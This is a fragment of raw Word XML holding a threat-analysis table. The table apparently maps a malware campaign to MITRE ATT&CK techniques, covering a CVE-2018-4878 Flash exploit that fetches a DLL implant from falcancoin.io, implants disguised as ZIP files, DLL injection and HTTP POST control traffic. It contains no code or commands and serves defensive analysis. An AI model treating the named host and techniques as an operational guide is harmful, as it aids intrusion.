              <w:t>The document contains an embedded Flash script that exploits CVE-2018-4878 and downloads and executes the DLL implant from falcancoin.io</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="004A37AE" w14:paraId="7E354B3E" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A972936"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1414F87A"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038D1D8A" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00515311" w:rsidRDefault="00F423B5" w:rsidP="0011494A">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57B2F9F8" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="082C79D6" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D4AB8F2" w14:textId="49B448CD" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="009C146D" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26A5EA37" w14:textId="358EDC60" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="009C146D" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="461712B4" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:r>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="004A37AE" w14:paraId="7AE7986C" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D949124" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27910997"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0229B4D6"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T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="150B1417" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A37AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="650E7F7C" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="783DB3AD" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="006115B2" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006115B2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7222E8CF" w14:textId="1171A593" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="009C146D" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="404A3BDE" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="002D1D50" w14:paraId="2E4B177E" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21CF7334" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00083830" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00083830">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E83510E" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">TA0005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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EC964A4" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00E21A04" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21A04">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1036 Masquerading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F26F0A0" w14:textId="64F61459" w:rsidR="00F423B5" w:rsidRPr="00E21A04" w:rsidRDefault="00DB3D38" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63E9E624" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F2EDFE0" w14:textId="4FE9B9BD" w:rsidR="00F423B5" w:rsidRPr="006115B2" w:rsidRDefault="009C146D" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="644F6452" w14:textId="3F656ED8" w:rsidR="00F423B5" w:rsidRPr="009C146D" w:rsidRDefault="009C146D" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C146D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54C896B9" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="009143CE">
              <w:t>The implants (DLLs) are disguised as ZIP files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="002D1D50" w14:paraId="1745383D" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11D0FFEA" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00083830" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00083830">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19F65DE5" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">TA0005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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B7CE246" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F632A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1055.001 Process Injection: Dynamic-link Library Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2101673B" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00597A2E" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DE20711" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7335FFB3" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="799F5EC6" w14:textId="6E95DB38" w:rsidR="00F423B5" w:rsidRPr="009C146D" w:rsidRDefault="009C146D" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7203CFBB" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="009143CE">
              <w:t xml:space="preserve">To mask itself, it can run as a regular </w:t>
            </w:r>
            <w:r w:rsidRPr="009143CE">
              <w:lastRenderedPageBreak/>
              <w:t>library loaded into a legitimate process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="004A37AE" w14:paraId="28A852DC" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="558B4703" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00B94ADB" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="00B94ADB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B302989" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00B94ADB" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94ADB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B94ADB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B94ADB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61B658BD" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00B94ADB" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B94ADB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>T1574.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B94ADB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B77410C" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00B94ADB" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="190742E7" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00B94ADB" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="469E4DB7" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00B94ADB" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42184F5B" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00B94ADB" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39A922C9" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="0035641D" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Replaced by 6 above after further investigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="004A37AE" w14:paraId="308E0A81" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C7F9398" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="254E079C"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3D86B9E6" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="0035641D" w:rsidRDefault="00F423B5" w:rsidP="0011494A">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7496784E" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B923AAD" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43E1DFE1" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B569D32" w14:textId="25475FEE" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="009C146D" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54D95490" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:r>
              <w:t>[1] The malware initiates communication with the control server by sending it an HTTP POST request with additional optional HTTP data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
